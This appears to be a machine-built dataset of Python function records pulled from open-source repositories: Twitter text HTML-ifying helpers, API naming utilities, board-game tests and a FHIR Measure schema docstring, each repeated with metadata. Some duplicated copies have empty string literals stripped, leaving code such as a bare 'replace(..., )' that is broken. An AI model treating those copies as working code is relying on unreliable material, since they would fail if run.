batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size)<|docstring|>Test all methods.<|endoftext|>
feb990a82639fb60aa6cec842b06a3aa807ceab1a868e5b69015086555f32a07
def htmlify_description(json_data): "Passed the raw JSON data about a User from Twitter's API, it returns an\n HTMLified version of the User's description.\n * Replaces t.co URLs with clickable, full links.\n * Makes #hashtags into clickable links.\n * Makes @usernames into clickable links.\n\n Different to htmlify_tweet() because:\n\n * Twitter user data only includes entities for urls, not hashtags etc.\n https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181\n\n * So we manually make the t.co links into their full, clickable version.\n * And then use twitter-text-python to linkify everything else.\n " try: desc = json_data['description'] except KeyError: return '' if (('entities' in json_data) and ('description' in json_data['entities'])): entities = json_data['entities']['description'] if ('urls' in entities): for entity in entities['urls']: (start, end) = (entity['indices'][0], entity['indices'][1]) shown_url = entity['display_url'] link_url = entity['expanded_url'] url_html = '<a href="%s" rel="external">%s</a>' desc = desc.replace(json_data['description'][start:end], (url_html % (link_url, shown_url))) parser = ttp.Parser() parsed = parser.parse(desc) return parsed.html
Passed the raw JSON data about a User from Twitter's API, it returns an HTMLified version of the User's description. * Replaces t.co URLs with clickable, full links. * Makes #hashtags into clickable links. * Makes @usernames into clickable links. Different to htmlify_tweet() because: * Twitter user data only includes entities for urls, not hashtags etc. https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181 * So we manually make the t.co links into their full, clickable version. * And then use twitter-text-python to linkify everything else.
ditto/twitter/utils.py
htmlify_description
philgyford/django-ditto
54
python
def htmlify_description(json_data): "Passed the raw JSON data about a User from Twitter's API, it returns an\n HTMLified version of the User's description.\n * Replaces t.co URLs with clickable, full links.\n * Makes #hashtags into clickable links.\n * Makes @usernames into clickable links.\n\n Different to htmlify_tweet() because:\n\n * Twitter user data only includes entities for urls, not hashtags etc.\n https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181\n\n * So we manually make the t.co links into their full, clickable version.\n * And then use twitter-text-python to linkify everything else.\n " try: desc = json_data['description'] except KeyError: return if (('entities' in json_data) and ('description' in json_data['entities'])): entities = json_data['entities']['description'] if ('urls' in entities): for entity in entities['urls']: (start, end) = (entity['indices'][0], entity['indices'][1]) shown_url = entity['display_url'] link_url = entity['expanded_url'] url_html = '<a href="%s" rel="external">%s</a>' desc = desc.replace(json_data['description'][start:end], (url_html % (link_url, shown_url))) parser = ttp.Parser() parsed = parser.parse(desc) return parsed.html
def htmlify_description(json_data): "Passed the raw JSON data about a User from Twitter's API, it returns an\n HTMLified version of the User's description.\n * Replaces t.co URLs with clickable, full links.\n * Makes #hashtags into clickable links.\n * Makes @usernames into clickable links.\n\n Different to htmlify_tweet() because:\n\n * Twitter user data only includes entities for urls, not hashtags etc.\n https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181\n\n * So we manually make the t.co links into their full, clickable version.\n * And then use twitter-text-python to linkify everything else.\n " try: desc = json_data['description'] except KeyError: return if (('entities' in json_data) and ('description' in json_data['entities'])): entities = json_data['entities']['description'] if ('urls' in entities): for entity in entities['urls']: (start, end) = (entity['indices'][0], entity['indices'][1]) shown_url = entity['display_url'] link_url = entity['expanded_url'] url_html = '<a href="%s" rel="external">%s</a>' desc = desc.replace(json_data['description'][start:end], (url_html % (link_url, shown_url))) parser = ttp.Parser() parsed = parser.parse(desc) return parsed.html<|docstring|>Passed the raw JSON data about a User from Twitter's API, it returns an HTMLified version of the User's description. * Replaces t.co URLs with clickable, full links. * Makes #hashtags into clickable links. * Makes @usernames into clickable links. Different to htmlify_tweet() because: * Twitter user data only includes entities for urls, not hashtags etc. https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181 * So we manually make the t.co links into their full, clickable version. * And then use twitter-text-python to linkify everything else.<|endoftext|>
3227f98c678e45d94793df219d7021abd9976149f8fced28afdcb93df4be8dc5
def htmlify_tweet(json_data): "Passed the raw JSON data about a Tweet from Twitter's API, it returns\n an HTMLified version of the Tweet's text. It:\n * Replaces linebreaks with '<br>'s.\n * Replaces @mentions with clickable @mentions.\n * Replaces #hashtags with clickable #hashtags.\n * Replaces $symbols with clickable $symbols.\n * Replaces t.co URLs with clickable, full links.\n " if ('full_text' in json_data): json_data['text'] = json_data['full_text'] if (('entities' in json_data) and ('symbols' not in json_data['entities'])): json_data['entities']['symbols'] = [] html = Twython.html_for_tweet(json_data, use_display_url=True, use_expanded_url=False) try: ents = json_data['entities'] except KeyError: ents = {} urls_count = (len(ents['urls']) if ('urls' in ents) else 0) media_count = (len(ents['media']) if ('media' in ents) else 0) hashtags_count = (len(ents['hashtags']) if ('hashtags' in ents) else 0) symbols_count = (len(ents['symbols']) if ('symbols' in ents) else 0) user_mentions_count = (len(ents['user_mentions']) if ('user_mentions' in ents) else 0) html = html.replace('class="twython-hashtag"', 'rel="external"') html = html.replace('class="twython-mention"', 'rel="external"') html = html.replace('class="twython-media"', 'rel="external"') html = html.replace('class="twython-symbol"', 'rel="external"') if (((urls_count + media_count) > 0) and (urls_count > 0)): for url in ents['urls']: html = html.replace(('<a href="%s" class="twython-url">' % url['url']), ('<a href="%s" rel="external">' % url['expanded_url'])) if (media_count > 0): for item in ents['media']: html = html.replace(('<a href="%s" rel="external">%s</a>' % (item['url'], item['display_url'])), '') if (((((urls_count + media_count) + hashtags_count) + symbols_count) + user_mentions_count) == 0): html = urlize(html) html = re.sub('\\n', '<br>', html.strip()) return html
Passed the raw JSON data about a Tweet from Twitter's API, it returns an HTMLified version of the Tweet's text. It: * Replaces linebreaks with '<br>'s. * Replaces @mentions with clickable @mentions. * Replaces #hashtags with clickable #hashtags. * Replaces $symbols with clickable $symbols. * Replaces t.co URLs with clickable, full links.
ditto/twitter/utils.py
htmlify_tweet
philgyford/django-ditto
54
python
def htmlify_tweet(json_data): "Passed the raw JSON data about a Tweet from Twitter's API, it returns\n an HTMLified version of the Tweet's text. It:\n * Replaces linebreaks with '<br>'s.\n * Replaces @mentions with clickable @mentions.\n * Replaces #hashtags with clickable #hashtags.\n * Replaces $symbols with clickable $symbols.\n * Replaces t.co URLs with clickable, full links.\n " if ('full_text' in json_data): json_data['text'] = json_data['full_text'] if (('entities' in json_data) and ('symbols' not in json_data['entities'])): json_data['entities']['symbols'] = [] html = Twython.html_for_tweet(json_data, use_display_url=True, use_expanded_url=False) try: ents = json_data['entities'] except KeyError: ents = {} urls_count = (len(ents['urls']) if ('urls' in ents) else 0) media_count = (len(ents['media']) if ('media' in ents) else 0) hashtags_count = (len(ents['hashtags']) if ('hashtags' in ents) else 0) symbols_count = (len(ents['symbols']) if ('symbols' in ents) else 0) user_mentions_count = (len(ents['user_mentions']) if ('user_mentions' in ents) else 0) html = html.replace('class="twython-hashtag"', 'rel="external"') html = html.replace('class="twython-mention"', 'rel="external"') html = html.replace('class="twython-media"', 'rel="external"') html = html.replace('class="twython-symbol"', 'rel="external"') if (((urls_count + media_count) > 0) and (urls_count > 0)): for url in ents['urls']: html = html.replace(('<a href="%s" class="twython-url">' % url['url']), ('<a href="%s" rel="external">' % url['expanded_url'])) if (media_count > 0): for item in ents['media']: html = html.replace(('<a href="%s" rel="external">%s</a>' % (item['url'], item['display_url'])), ) if (((((urls_count + media_count) + hashtags_count) + symbols_count) + user_mentions_count) == 0): html = urlize(html) html = re.sub('\\n', '<br>', html.strip()) return html
def htmlify_tweet(json_data): "Passed the raw JSON data about a Tweet from Twitter's API, it returns\n an HTMLified version of the Tweet's text. It:\n * Replaces linebreaks with '<br>'s.\n * Replaces @mentions with clickable @mentions.\n * Replaces #hashtags with clickable #hashtags.\n * Replaces $symbols with clickable $symbols.\n * Replaces t.co URLs with clickable, full links.\n " if ('full_text' in json_data): json_data['text'] = json_data['full_text'] if (('entities' in json_data) and ('symbols' not in json_data['entities'])): json_data['entities']['symbols'] = [] html = Twython.html_for_tweet(json_data, use_display_url=True, use_expanded_url=False) try: ents = json_data['entities'] except KeyError: ents = {} urls_count = (len(ents['urls']) if ('urls' in ents) else 0) media_count = (len(ents['media']) if ('media' in ents) else 0) hashtags_count = (len(ents['hashtags']) if ('hashtags' in ents) else 0) symbols_count = (len(ents['symbols']) if ('symbols' in ents) else 0) user_mentions_count = (len(ents['user_mentions']) if ('user_mentions' in ents) else 0) html = html.replace('class="twython-hashtag"', 'rel="external"') html = html.replace('class="twython-mention"', 'rel="external"') html = html.replace('class="twython-media"', 'rel="external"') html = html.replace('class="twython-symbol"', 'rel="external"') if (((urls_count + media_count) > 0) and (urls_count > 0)): for url in ents['urls']: html = html.replace(('<a href="%s" class="twython-url">' % url['url']), ('<a href="%s" rel="external">' % url['expanded_url'])) if (media_count > 0): for item in ents['media']: html = html.replace(('<a href="%s" rel="external">%s</a>' % (item['url'], item['display_url'])), ) if (((((urls_count + media_count) + hashtags_count) + symbols_count) + user_mentions_count) == 0): html = urlize(html) html = re.sub('\\n', '<br>', html.strip()) return html<|docstring|>Passed the raw JSON data about a Tweet from Twitter's API, it returns an HTMLified version of the Tweet's text. It: * Replaces linebreaks with '<br>'s. * Replaces @mentions with clickable @mentions. * Replaces #hashtags with clickable #hashtags. * Replaces $symbols with clickable $symbols. * Replaces t.co URLs with clickable, full links.<|endoftext|>
0cf998a9dc02e299177fa3930f96fffb0836ade8314235123c90174362bdfc2a
@classmethod def build(cls, *file_descriptors: Iterable[descriptor_pb2.FileDescriptorProto]) -> 'Naming': 'Return a full Naming instance based on these file descriptors.\n\n This is pieced together from the proto package names as well as the\n ``google.api.metadata`` file annotation. This information may be\n present in one or many files; this method is tolerant as long as\n the data does not conflict.\n\n Args:\n file_descriptors (Iterable[~.FileDescriptorProto]): A list of\n file descriptor protos. This list should only include the\n files actually targeted for output (not their imports).\n\n Returns:\n ~.Naming: A :class:`~.Naming` instance which is provided to\n templates as part of the :class:`~.API`.\n\n Raises:\n ValueError: If the provided file descriptors contain contradictory\n information.\n ' proto_packages = {fd.package for fd in file_descriptors} root_package = os.path.commonprefix(tuple(proto_packages)).rstrip('.') if (not root_package): raise ValueError(f"The protos provided do not share a common root package. Ensure that all explicitly-specified protos are for a single API. The packages we got are: {', '.join(proto_packages)}") pattern = '^((?P<namespace>[a-z0-9_.]+)\\.)?(?P<name>[a-z0-9_]+)' version = '\\.(?P<version>v[0-9]+(p[0-9]+)?((alpha|beta)[0-9]+)?)' if re.search(version, root_package): pattern += version match = re.search(pattern=pattern, string=root_package).groupdict() match['namespace'] = (match['namespace'] or '') package_info = cls(name=match['name'].capitalize(), namespace=tuple([i.capitalize() for i in match['namespace'].split('.') if i]), product_name=match['name'].capitalize(), proto_package=root_package, version=match.get('version', '')) if ((not package_info.version) and (len(proto_packages) > 1)): raise ValueError('All protos must have the same proto package up to and including the version.') explicit_pkgs = set() for fd in file_descriptors: pkg = fd.options.Extensions[client_pb2.client_package] naming = cls(name=(pkg.title or pkg.product_title), namespace=tuple(pkg.namespace), version=pkg.version) if naming: explicit_pkgs.add(naming) if (len(explicit_pkgs) > 1): raise ValueError('If the google.api.client_package annotation is provided in more than one file, it must be consistent.') if len(explicit_pkgs): return dataclasses.replace(package_info, **dataclasses.asdict(explicit_pkgs.pop())) return package_info
Return a full Naming instance based on these file descriptors. This is pieced together from the proto package names as well as the ``google.api.metadata`` file annotation. This information may be present in one or many files; this method is tolerant as long as the data does not conflict. Args: file_descriptors (Iterable[~.FileDescriptorProto]): A list of file descriptor protos. This list should only include the files actually targeted for output (not their imports). Returns: ~.Naming: A :class:`~.Naming` instance which is provided to templates as part of the :class:`~.API`. Raises: ValueError: If the provided file descriptors contain contradictory information.
gapic/schema/naming.py
build
nsky80/gapic-generator-python
1
python
@classmethod def build(cls, *file_descriptors: Iterable[descriptor_pb2.FileDescriptorProto]) -> 'Naming': 'Return a full Naming instance based on these file descriptors.\n\n This is pieced together from the proto package names as well as the\n ``google.api.metadata`` file annotation. This information may be\n present in one or many files; this method is tolerant as long as\n the data does not conflict.\n\n Args:\n file_descriptors (Iterable[~.FileDescriptorProto]): A list of\n file descriptor protos. This list should only include the\n files actually targeted for output (not their imports).\n\n Returns:\n ~.Naming: A :class:`~.Naming` instance which is provided to\n templates as part of the :class:`~.API`.\n\n Raises:\n ValueError: If the provided file descriptors contain contradictory\n information.\n ' proto_packages = {fd.package for fd in file_descriptors} root_package = os.path.commonprefix(tuple(proto_packages)).rstrip('.') if (not root_package): raise ValueError(f"The protos provided do not share a common root package. Ensure that all explicitly-specified protos are for a single API. The packages we got are: {', '.join(proto_packages)}") pattern = '^((?P<namespace>[a-z0-9_.]+)\\.)?(?P<name>[a-z0-9_]+)' version = '\\.(?P<version>v[0-9]+(p[0-9]+)?((alpha|beta)[0-9]+)?)' if re.search(version, root_package): pattern += version match = re.search(pattern=pattern, string=root_package).groupdict() match['namespace'] = (match['namespace'] or ) package_info = cls(name=match['name'].capitalize(), namespace=tuple([i.capitalize() for i in match['namespace'].split('.') if i]), product_name=match['name'].capitalize(), proto_package=root_package, version=match.get('version', )) if ((not package_info.version) and (len(proto_packages) > 1)): raise ValueError('All protos must have the same proto package up to and including the version.') explicit_pkgs = set() for fd in file_descriptors: pkg = fd.options.Extensions[client_pb2.client_package] naming = cls(name=(pkg.title or pkg.product_title), namespace=tuple(pkg.namespace), version=pkg.version) if naming: explicit_pkgs.add(naming) if (len(explicit_pkgs) > 1): raise ValueError('If the google.api.client_package annotation is provided in more than one file, it must be consistent.') if len(explicit_pkgs): return dataclasses.replace(package_info, **dataclasses.asdict(explicit_pkgs.pop())) return package_info
@classmethod def build(cls, *file_descriptors: Iterable[descriptor_pb2.FileDescriptorProto]) -> 'Naming': 'Return a full Naming instance based on these file descriptors.\n\n This is pieced together from the proto package names as well as the\n ``google.api.metadata`` file annotation. This information may be\n present in one or many files; this method is tolerant as long as\n the data does not conflict.\n\n Args:\n file_descriptors (Iterable[~.FileDescriptorProto]): A list of\n file descriptor protos. This list should only include the\n files actually targeted for output (not their imports).\n\n Returns:\n ~.Naming: A :class:`~.Naming` instance which is provided to\n templates as part of the :class:`~.API`.\n\n Raises:\n ValueError: If the provided file descriptors contain contradictory\n information.\n ' proto_packages = {fd.package for fd in file_descriptors} root_package = os.path.commonprefix(tuple(proto_packages)).rstrip('.') if (not root_package): raise ValueError(f"The protos provided do not share a common root package. Ensure that all explicitly-specified protos are for a single API. The packages we got are: {', '.join(proto_packages)}") pattern = '^((?P<namespace>[a-z0-9_.]+)\\.)?(?P<name>[a-z0-9_]+)' version = '\\.(?P<version>v[0-9]+(p[0-9]+)?((alpha|beta)[0-9]+)?)' if re.search(version, root_package): pattern += version match = re.search(pattern=pattern, string=root_package).groupdict() match['namespace'] = (match['namespace'] or ) package_info = cls(name=match['name'].capitalize(), namespace=tuple([i.capitalize() for i in match['namespace'].split('.') if i]), product_name=match['name'].capitalize(), proto_package=root_package, version=match.get('version', )) if ((not package_info.version) and (len(proto_packages) > 1)): raise ValueError('All protos must have the same proto package up to and including the version.') explicit_pkgs = set() for fd in file_descriptors: pkg = fd.options.Extensions[client_pb2.client_package] naming = cls(name=(pkg.title or pkg.product_title), namespace=tuple(pkg.namespace), version=pkg.version) if naming: explicit_pkgs.add(naming) if (len(explicit_pkgs) > 1): raise ValueError('If the google.api.client_package annotation is provided in more than one file, it must be consistent.') if len(explicit_pkgs): return dataclasses.replace(package_info, **dataclasses.asdict(explicit_pkgs.pop())) return package_info<|docstring|>Return a full Naming instance based on these file descriptors. This is pieced together from the proto package names as well as the ``google.api.metadata`` file annotation. This information may be present in one or many files; this method is tolerant as long as the data does not conflict. Args: file_descriptors (Iterable[~.FileDescriptorProto]): A list of file descriptor protos. This list should only include the files actually targeted for output (not their imports). Returns: ~.Naming: A :class:`~.Naming` instance which is provided to templates as part of the :class:`~.API`. Raises: ValueError: If the provided file descriptors contain contradictory information.<|endoftext|>
491f2af3b90b94e733286f13f304fa98f18cb6ab6412befd5b7642de9d65e4e8
def __bool__(self): 'Return True if any of the fields are truthy, False otherwise.' return any([getattr(self, i.name) for i in dataclasses.fields(self)])
Return True if any of the fields are truthy, False otherwise.
gapic/schema/naming.py
__bool__
nsky80/gapic-generator-python
1
python
def __bool__(self): return any([getattr(self, i.name) for i in dataclasses.fields(self)])
def __bool__(self): return any([getattr(self, i.name) for i in dataclasses.fields(self)])<|docstring|>Return True if any of the fields are truthy, False otherwise.<|endoftext|>
bbe26e708a9e3271086766836ceebec5269af7d94c275c7b6a19e12598bcb26b
@property def long_name(self) -> str: 'Return an appropriate title-cased long name.' return ' '.join((tuple(self.namespace) + (self.name,)))
Return an appropriate title-cased long name.
gapic/schema/naming.py
long_name
nsky80/gapic-generator-python
1
python
@property def long_name(self) -> str: return ' '.join((tuple(self.namespace) + (self.name,)))
@property def long_name(self) -> str: return ' '.join((tuple(self.namespace) + (self.name,)))<|docstring|>Return an appropriate title-cased long name.<|endoftext|>
966d7b671cb06347aa4e62471555392935007a95be23e7ad981ac2eea535139e
@property def module_name(self) -> str: 'Return the appropriate Python module name.' return utils.to_valid_module_name(self.name)
Return the appropriate Python module name.
gapic/schema/naming.py
module_name
nsky80/gapic-generator-python
1
python
@property def module_name(self) -> str: return utils.to_valid_module_name(self.name)
@property def module_name(self) -> str: return utils.to_valid_module_name(self.name)<|docstring|>Return the appropriate Python module name.<|endoftext|>
46adab8be26bd914a430ee59b7bb3cd0209f4b24480d94afd640e22108848f8f
@property def module_namespace(self) -> Sequence[str]: 'Return the appropriate Python module namespace as a tuple.' return tuple((utils.to_valid_module_name(i) for i in self.namespace))
Return the appropriate Python module namespace as a tuple.
gapic/schema/naming.py
module_namespace
nsky80/gapic-generator-python
1
python
@property def module_namespace(self) -> Sequence[str]: return tuple((utils.to_valid_module_name(i) for i in self.namespace))
@property def module_namespace(self) -> Sequence[str]: return tuple((utils.to_valid_module_name(i) for i in self.namespace))<|docstring|>Return the appropriate Python module namespace as a tuple.<|endoftext|>
02f57877e2ae72c4b19755432fc16668bcc8ade400c41d1c4433323c9c7a20f4
@property def namespace_packages(self) -> Tuple[str]: 'Return the appropriate Python namespace packages.' answer = [] for cursor in [i.lower() for i in self.namespace]: answer.append((f'{answer[(- 1)]}.{cursor}' if answer else cursor)) return tuple(answer)
Return the appropriate Python namespace packages.
gapic/schema/naming.py
namespace_packages
nsky80/gapic-generator-python
1
python
@property def namespace_packages(self) -> Tuple[str]: answer = [] for cursor in [i.lower() for i in self.namespace]: answer.append((f'{answer[(- 1)]}.{cursor}' if answer else cursor)) return tuple(answer)
@property def namespace_packages(self) -> Tuple[str]: answer = [] for cursor in [i.lower() for i in self.namespace]: answer.append((f'{answer[(- 1)]}.{cursor}' if answer else cursor)) return tuple(answer)<|docstring|>Return the appropriate Python namespace packages.<|endoftext|>
ae28db92b09ddbd39deb52ca92bed8cf7b1df04d21af318f5afbe4b3d1b34340
@property def versioned_module_name(self) -> str: 'Return the versiond module name (e.g. ``apiname_v1``).\n\n If there is no version, this is the same as ``module_name``.\n ' if self.version: return f'{self.module_name}_{self.version}' return self.module_name
Return the versiond module name (e.g. ``apiname_v1``). If there is no version, this is the same as ``module_name``.
gapic/schema/naming.py
versioned_module_name
nsky80/gapic-generator-python
1
python
@property def versioned_module_name(self) -> str: 'Return the versiond module name (e.g. ``apiname_v1``).\n\n If there is no version, this is the same as ``module_name``.\n ' if self.version: return f'{self.module_name}_{self.version}' return self.module_name
@property def versioned_module_name(self) -> str: 'Return the versiond module name (e.g. ``apiname_v1``).\n\n If there is no version, this is the same as ``module_name``.\n ' if self.version: return f'{self.module_name}_{self.version}' return self.module_name<|docstring|>Return the versiond module name (e.g. ``apiname_v1``). If there is no version, this is the same as ``module_name``.<|endoftext|>
f69d032a80821134278f29af5a6afe4cddcc254e8173c0ecea91ecd76cc1d158
@property def warehouse_package_name(self) -> str: 'Return the appropriate Python package name for Warehouse.' answer = (list(self.namespace) + self.name.split(' ')) return '-'.join(answer).lower()
Return the appropriate Python package name for Warehouse.
gapic/schema/naming.py
warehouse_package_name
nsky80/gapic-generator-python
1
python
@property def warehouse_package_name(self) -> str: answer = (list(self.namespace) + self.name.split(' ')) return '-'.join(answer).lower()
@property def warehouse_package_name(self) -> str: answer = (list(self.namespace) + self.name.split(' ')) return '-'.join(answer).lower()<|docstring|>Return the appropriate Python package name for Warehouse.<|endoftext|>
a6172010a3c6935385a60011436839465ddf1bfa80f108760365c4b10ce1f9c4
def get_params(self, deep=False): '\n Get the parameters for this operator.\n ' return core.get_params(self)
Get the parameters for this operator.
src/python/nimbusml/feature_extraction/categorical/onehothashvectorizer.py
get_params
najeeb-kazmi/NimbusML
134
python
def get_params(self, deep=False): '\n \n ' return core.get_params(self)
def get_params(self, deep=False): '\n \n ' return core.get_params(self)<|docstring|>Get the parameters for this operator.<|endoftext|>
213dcfb53b32f6fd2b7081a2576dd11f81df3269012b082ffd1f54e78d77a886
@pytest.mark.django_db def test_get_special(some_datetime): "Test retrieving a square's special square type." special = baker.make('SpecialSquareType', image='') baker.make('SpecialSquare', square=5, type=special) square = board.Square(number=5, current_position=1, now=some_datetime) assert (special == square.get_special())
Test retrieving a square's special square type.
will_of_the_prophets/tests/test_square.py
test_get_special
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db def test_get_special(some_datetime): special = baker.make('SpecialSquareType', image=) baker.make('SpecialSquare', square=5, type=special) square = board.Square(number=5, current_position=1, now=some_datetime) assert (special == square.get_special())
@pytest.mark.django_db def test_get_special(some_datetime): special = baker.make('SpecialSquareType', image=) baker.make('SpecialSquare', square=5, type=special) square = board.Square(number=5, current_position=1, now=some_datetime) assert (special == square.get_special())<|docstring|>Test retrieving a square's special square type.<|endoftext|>
5cc54dfadbc365c39f3e19d2a697392c392b4dac3fdf3af18c70dcbd420d5553
@pytest.mark.django_db def test_get_butthole_ends(some_datetime): 'Test getting the list of buttholes which end in this square.' for start_square in (55, 66, 77): baker.make('Butthole', start_square=start_square, end_square=26) square = board.Square(number=26, current_position=1, now=some_datetime) assert (set(square.get_butthole_ends()) == set([55, 66, 77]))
Test getting the list of buttholes which end in this square.
will_of_the_prophets/tests/test_square.py
test_get_butthole_ends
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db def test_get_butthole_ends(some_datetime): for start_square in (55, 66, 77): baker.make('Butthole', start_square=start_square, end_square=26) square = board.Square(number=26, current_position=1, now=some_datetime) assert (set(square.get_butthole_ends()) == set([55, 66, 77]))
@pytest.mark.django_db def test_get_butthole_ends(some_datetime): for start_square in (55, 66, 77): baker.make('Butthole', start_square=start_square, end_square=26) square = board.Square(number=26, current_position=1, now=some_datetime) assert (set(square.get_butthole_ends()) == set([55, 66, 77]))<|docstring|>Test getting the list of buttholes which end in this square.<|endoftext|>
453964647caf2f6718eceb243c7f712c72b4aecb96417dfb1ab2b3f9fc4a5cef
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, was_visited', [(74, 75, True), (75, 75, False), (76, 75, False)]) def test_was_visited(some_datetime, number, pos, was_visited): 'Test that the was_visited flag is set correctly on squares.' square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.was_visited == was_visited)
Test that the was_visited flag is set correctly on squares.
will_of_the_prophets/tests/test_square.py
test_was_visited
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, was_visited', [(74, 75, True), (75, 75, False), (76, 75, False)]) def test_was_visited(some_datetime, number, pos, was_visited): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.was_visited == was_visited)
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, was_visited', [(74, 75, True), (75, 75, False), (76, 75, False)]) def test_was_visited(some_datetime, number, pos, was_visited): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.was_visited == was_visited)<|docstring|>Test that the was_visited flag is set correctly on squares.<|endoftext|>
51c224995d9a5727d46c084a08be225203d353d2a85fa1a44bb4e9c6c9c7d0a8
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, is_current_position', [(74, 75, False), (75, 75, True), (76, 75, False)]) def test_is_current_position(some_datetime, number, pos, is_current_position): 'Test the is_current_position flag is set correctly.' square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.is_current_position == is_current_position)
Test the is_current_position flag is set correctly.
will_of_the_prophets/tests/test_square.py
test_is_current_position
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, is_current_position', [(74, 75, False), (75, 75, True), (76, 75, False)]) def test_is_current_position(some_datetime, number, pos, is_current_position): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.is_current_position == is_current_position)
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, is_current_position', [(74, 75, False), (75, 75, True), (76, 75, False)]) def test_is_current_position(some_datetime, number, pos, is_current_position): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.is_current_position == is_current_position)<|docstring|>Test the is_current_position flag is set correctly.<|endoftext|>
bd8a476f5ee6a8661803d633f123c0d9789bab048830862cf6939a971a6195d4
@staticmethod def get_schema(max_nesting_depth: Optional[int]=6, nesting_depth: int=0, nesting_list: List[str]=[], max_recursion_limit: Optional[int]=2, include_extension: Optional[bool]=False, extension_fields: Optional[List[str]]=['valueBoolean', 'valueCode', 'valueDate', 'valueDateTime', 'valueDecimal', 'valueId', 'valueInteger', 'valuePositiveInt', 'valueString', 'valueTime', 'valueUnsignedInt', 'valueUri', 'valueQuantity'], extension_depth: int=0, max_extension_depth: Optional[int]=2) -> Union[(StructType, DataType)]: '\n The Measure resource provides the definition of a quality measure.\n\n\n id: The logical id of the resource, as used in the URL for the resource. Once\n assigned, this value never changes.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the resource. In order to make the use of extensions safe and\n manageable, there is a strict set of governance applied to the definition and\n use of extensions. Though any implementer is allowed to define an extension,\n there is a set of requirements that SHALL be met as part of the definition of\n the extension.\n\n meta: The metadata about the resource. This is content that is maintained by the\n infrastructure. Changes to the content may not always be associated with\n version changes to the resource.\n\n implicitRules: A reference to a set of rules that were followed when the resource was\n constructed, and which must be understood when processing the content.\n\n language: The base language in which the resource is written.\n\n text: A human-readable narrative that contains a summary of the resource, and may be\n used to represent the content of the resource to a human. The narrative need\n not encode all the structured data, but is required to contain sufficient\n detail to make it "clinically safe" for a human to just read the narrative.\n Resource definitions may define what content should be represented in the\n narrative to ensure clinical safety.\n\n contained: These resources do not have an independent existence apart from the resource\n that contains them - they cannot be identified independently, and nor can they\n have their own independent transaction scope.\n\n resourceType: This is a Measure resource\n\n url: An absolute URI that is used to identify this measure when it is referenced in\n a specification, model, design or an instance. This SHALL be a URL, SHOULD be\n globally unique, and SHOULD be an address at which this measure is (or will\n be) published. The URL SHOULD include the major version of the measure. For\n more information see [Technical and Business\n Versions](resource.html#versions).\n\n identifier: A formal identifier that is used to identify this measure when it is\n represented in other formats, or referenced in a specification, model, design\n or an instance.\n\n version: The identifier that is used to identify this version of the measure when it is\n referenced in a specification, model, design or instance. This is an arbitrary\n value managed by the measure author and is not expected to be globally unique.\n For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is\n not available. There is also no expectation that versions can be placed in a\n lexicographical sequence. To provide a version consistent with the Decision\n Support Service specification, use the format Major.Minor.Revision (e.g.\n 1.0.0). For more information on versioning knowledge assets, refer to the\n Decision Support Service specification. Note that a version is required for\n non-experimental active artifacts.\n\n name: A natural language name identifying the measure. This name should be usable as\n an identifier for the module by machine processing applications such as code\n generation.\n\n title: A short, descriptive, user-friendly title for the measure.\n\n status: The status of this measure. Enables tracking the life-cycle of the content.\n\n experimental: A boolean value to indicate that this measure is authored for testing purposes\n (or education/evaluation/marketing), and is not intended to be used for\n genuine usage.\n\n date: The date (and optionally time) when the measure was published. The date must\n change if and when the business version changes and it must change if the\n status code changes. In addition, it should change when the substantive\n content of the measure changes.\n\n publisher: The name of the individual or organization that published the measure.\n\n description: A free text natural language description of the measure from a consumer\'s\n perspective.\n\n purpose: Explaination of why this measure is needed and why it has been designed as it\n has.\n\n usage: A detailed description of how the measure is used from a clinical perspective.\n\n approvalDate: The date on which the resource content was approved by the publisher. Approval\n happens once when the content is officially approved for usage.\n\n lastReviewDate: The date on which the resource content was last reviewed. Review happens\n periodically after approval, but doesn\'t change the original approval date.\n\n effectivePeriod: The period during which the measure content was or is planned to be in active\n use.\n\n useContext: The content was developed with a focus and intent of supporting the contexts\n that are listed. These terms may be used to assist with indexing and searching\n for appropriate measure instances.\n\n jurisdiction: A legal or geographic region in which the measure is intended to be used.\n\n topic: Descriptive topics related to the content of the measure. Topics provide a\n high-level categorization of the type of the measure that can be useful for\n filtering and searching.\n\n contributor: A contributor to the content of the measure, including authors, editors,\n reviewers, and endorsers.\n\n contact: Contact details to assist a user in finding and communicating with the\n publisher.\n\n copyright: A copyright statement relating to the measure and/or its contents. Copyright\n statements are generally legal restrictions on the use and publishing of the\n measure.\n\n relatedArtifact: Related artifacts such as additional documentation, justification, or\n bibliographic references.\n\n library: A reference to a Library resource containing the formal logic used by the\n measure.\n\n disclaimer: Notices and disclaimers regarding the use of the measure, or related to\n intellectual property (such as code systems) referenced by the measure.\n\n scoring: Indicates how the calculation is performed for the measure, including\n proportion, ratio, continuous variable, and cohort. The value set is\n extensible, allowing additional measure scoring types to be represented.\n\n compositeScoring: If this is a composite measure, the scoring method used to combine the\n component measures to determine the composite score.\n\n type: Indicates whether the measure is used to examine a process, an outcome over\n time, a patient-reported outcome, or a structure measure such as utilization.\n\n riskAdjustment: A description of the risk adjustment factors that may impact the resulting\n score for the measure and how they may be accounted for when computing and\n reporting measure results.\n\n rateAggregation: Describes how to combine the information calculated, based on logic in each of\n several populations, into one summarized result.\n\n rationale: Provides a 